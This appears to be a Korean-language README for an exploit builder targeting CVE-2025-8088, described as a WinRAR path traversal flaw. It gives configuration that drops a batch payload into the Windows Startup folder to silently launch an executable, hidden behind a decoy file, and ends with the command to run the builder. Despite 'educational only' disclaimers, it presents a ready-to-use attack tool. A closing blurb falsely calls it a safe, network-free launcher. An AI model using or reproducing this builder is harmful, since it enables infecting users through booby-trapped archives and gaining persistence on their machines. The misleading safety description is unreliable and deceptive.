
CVE-2025-8088-BUILDER
⚠ 이 도구는 교육 목적으로만 제작되었습니다. 통제된 환경 밖에서의 무단 사용은 엄격히 금지됩니다.
CVE-2025-8088을 악용하는 Python 스크립트입니다. WinRAR의 경로 순회 취약점으로, 여러 단계의 상대 디렉터리 레벨을 사용하여 악성 아카이브를 생성함으로써 실행 가능한 페이로드를 Windows 시작 폴더에 배치하고, 추출 위치와 관계없이 안정적으로 실행되도록 보장합니다.
config.py 파일을 구성하십시오
# Configuration
DECOY_FILE_NAME = "document"
DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.bat"
PAYLOAD = "@echo off\nstart /B C:\Users\Public\file.exe\n"
자체 유인(데코이) 파일을 사용하려면 이름 대신 전체 경로를 입력하십시오.
스크립트를 실행합니다:
python CVE-2025-8088.py
출력물은 output 폴더에 나타납니다.
이 도구는 교육 목적으로만 제작되었습니다. 통제된 환경 밖에서의 무단 사용은 엄격히 금지됩니다.
저자: Desert Scripts
설명:
MyAppInstaller.exe를 실행하는 로컬 오프라인 런처입니다.
네트워크 활동이 없습니다. 안전하고 투명합니다.